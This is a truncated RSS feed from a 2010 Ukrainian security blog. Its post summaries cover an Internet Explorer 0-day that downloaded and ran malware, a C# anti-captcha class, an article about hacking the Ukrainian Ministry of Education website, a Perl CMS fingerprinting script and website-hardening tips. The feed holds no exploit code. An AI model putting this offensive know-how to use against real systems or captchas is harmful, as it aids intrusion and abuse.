		<comments>http://uasc.org.ua/2010/03/0-day-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82-%d0%b4%d0%bb%d1%8f-internet-explorer/#comments</comments>
		<pubDate>Fri, 12 Mar 2010 15:03:09 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[0-day]]></category>
		<category><![CDATA[download & execute]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[IE6]]></category>
		<category><![CDATA[IE7]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[експлойт]]></category>
		<category><![CDATA[зіродей]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=839</guid>
		<description>Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп&amp;#8217;ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/mPCsI38S-oE" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/0-day-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82-%d0%b4%d0%bb%d1%8f-internet-explorer/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/03/0-day-%d0%b5%d0%ba%d1%81%d0%bf%d0%bb%d0%be%d0%b9%d1%82-%d0%b4%d0%bb%d1%8f-internet-explorer/</feedburner:origLink></item>
		<item>
		<title>клас для роботи з антикапчею на C#</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/YVuV43VAw6g/</link>
		<comments>http://uasc.org.ua/2010/03/%d0%ba%d0%bb%d0%b0%d1%81-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d0%b0%d0%bd%d1%82%d0%b8%d0%ba%d0%b0%d0%bf%d1%87%d0%b5%d1%8e-%d0%bd%d0%b0-c/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 18:29:36 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Інше]]></category>
		<category><![CDATA[anticaptcha]]></category>
		<category><![CDATA[c#]]></category>
		<category><![CDATA[class]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=826</guid>
		<description>готовий, зручний клас для роботи з антикапчою на шарпі.. клас і опис під катом =)
доречі, вітаю прекрасну половину людства з 8м березням )



змінні:
    public bool debug = false;
        режим дебагу: якшо активний - "клас" буде вас сповіщати про всі свої дії )
    [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/YVuV43VAw6g" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/%d0%ba%d0%bb%d0%b0%d1%81-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d0%b0%d0%bd%d1%82%d0%b8%d0%ba%d0%b0%d0%bf%d1%87%d0%b5%d1%8e-%d0%bd%d0%b0-c/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/03/%d0%ba%d0%bb%d0%b0%d1%81-%d0%b4%d0%bb%d1%8f-%d1%80%d0%be%d0%b1%d0%be%d1%82%d0%b8-%d0%b7-%d0%b0%d0%bd%d1%82%d0%b8%d0%ba%d0%b0%d0%bf%d1%87%d0%b5%d1%8e-%d0%bd%d0%b0-c/</feedburner:origLink></item>
		<item>
		<title>Взлом Міністерства Освіти і Науки України – стаття в хакері</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/OauxpjO7q-M/</link>
		<comments>http://uasc.org.ua/2010/03/811/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 19:34:27 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[gov сайты под угрозой]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[мон]]></category>
		<category><![CDATA[стаття]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=811</guid>
		<description>В журналі &amp;#8220;][акер" #134 2010 р. вийшла моя стаття "GOV сайты под угрозой". Далі оригінал статті на російській мові.

GOV сайты под угрозой
Взлом сайта Министерства образования и науки Украины
Paketik (http://uasc.org.ua) (З невідомих причин в журналі надрукували "Анонім", хоча я подавав саме такі дані)
В последнее время мне все чаще попадаются уязвимые государственные сайты. А причина банальна: сайты [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/OauxpjO7q-M" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/03/811/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/03/811/</feedburner:origLink></item>
		<item>
		<title>GetEngine v0.1</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/oeQzZA93boc/</link>
		<comments>http://uasc.org.ua/2010/02/getengine-v0-1/#comments</comments>
		<pubDate>Fri, 26 Feb 2010 14:10:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[GetEngine]]></category>
		<category><![CDATA[версії]]></category>
		<category><![CDATA[визначення]]></category>
		<category><![CDATA[двигуна]]></category>
		<category><![CDATA[определение версии движка]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=802</guid>
		<description>скрипт для автоматичного визначення імені і версії двигла на сайті по локальній базі.

яп: перл
дата останнього обновлення бази: 21.07.2009
розпізнає: ~70 движків (та їх версій)

запуска: 1.pl site.com
запуска з повним відображенням процесу: 1.pl site.com -debug
http://www.sendspace.com/file/vii235
http://uasc.org.ua/files/GetEngine.zip&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/oeQzZA93boc" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/02/getengine-v0-1/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/02/getengine-v0-1/</feedburner:origLink></item>
		<item>
		<title>Ідеальна безпека сайту</title>
		<link>http://feedproxy.google.com/~r/uasc/~3/_qnftt11_F0/</link>
		<comments>http://uasc.org.ua/2010/02/%d1%96%d0%b4%d0%b5%d0%b0%d0%bb%d1%8c%d0%bd%d0%b0-%d0%b1%d0%b5%d0%b7%d0%bf%d0%b5%d0%ba%d0%b0-%d1%81%d0%b0%d0%b9%d1%82%d1%83/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 12:31:11 +0000</pubDate>
		<dc:creator>presidentua</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[захист]]></category>
		<category><![CDATA[обмеження]]></category>
		<category><![CDATA[сервер]]></category>
		<category><![CDATA[хакінг]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=795</guid>
		<description>Найпопулярніше питаня до нас це &amp;#8220;Як зробити, щоб нічого не робити, а сайт був супер-безпечний&amp;#8221;, і постійно ми відповідали по різному максимально приховуючи АБСОЛЮТНО-СУПЕР-СЕКРЕТНУ технологію, що була розроблема століння назад. І лише сьогодні цім секретом поділимося ), тож якщо ви хочете створювати безпечний сайт, то ось 5 рекомендацій:

При програмуванні використовуйте фреймворки, типу ЗендФреймворка, КодеІгнайтера, Джанго, [...]&lt;img src="http://feeds.feedburner.com/~r/uasc/~4/_qnftt11_F0" height="1" width="1"/&gt;</description>
		<wfw:commentRss>http://uasc.org.ua/2010/02/%d1%96%d0%b4%d0%b5%d0%b0%d0%bb%d1%8c%d0%bd%d0%b0-%d0%b1%d0%b5%d0%b7%d0%bf%d0%b5%d0%ba%d0%b0-%d1%81%d0%b0%d0%b9%d1%82%d1%83/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://uasc.org.ua/2010/02/%d1%96%d0%b4%d0%b5%d0%b0%d0%bb%d1%8c%d0%bd%d0%b0-%d0%b1%d0%b5%d0%b7%d0%bf%d0%b5%d0%ba%d0%b0-%d1%81%d0%b0%d0%b9%d1%82%d1%83/</feedburner:origLink></item>
	</channel>
</rss>
